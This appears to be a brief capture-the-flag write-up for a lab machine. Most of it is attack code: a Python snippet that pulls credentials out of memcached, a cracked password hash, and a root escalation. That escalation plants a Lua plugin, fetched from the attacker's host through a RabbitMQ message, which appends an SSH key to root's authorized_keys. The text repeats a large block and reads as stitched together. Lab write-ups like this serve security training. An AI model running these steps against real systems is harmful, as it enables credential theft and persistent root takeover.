Writeup
Writeup
Writeup
http://test.dyplasher.htb:3000/felamos/memcached.git
using python3 and bmemcached we can get the hashed passwords of the users
on test.dyplasher.htb:3000:
import bmemcached
client = bmemcached.Client(('10.10.10.190:11211', ), 'felamos', 'zxcvbnm')
print(client.get('password'))
print(client.get('username'))
print(client.get('email'))
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK = mommy1
password: tieb0graQueg
root
2-To get root on your machine: make a file plugin.lua with contents
os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")
replace [PUB SSH KEY] with your public key located at /root/.ssh/id_rsa.pub
connection = pika.BlockingConnection(
pika.ConnectionParameters(
'127.0.0.1',
5672,
credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
)
)
channel = connection.channel()
channel.basic_publish(
exchange='plugin_data',
routing_key='',
body='http://[ip]:11211/plugin.lua'
)
connection.close()
password: tieb0graQueg
root
2-To get root on your machine: make a file plugin.lua with contents
os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")
replace [PUB SSH KEY] with your public key located at /root/.ssh/id_rsa.pub
channel = connection.channel()
channel.basic_publish(
exchange='plugin_data',
routing_key='',
body='http://[IP]:11211/plugin.lua'
)
connection.close()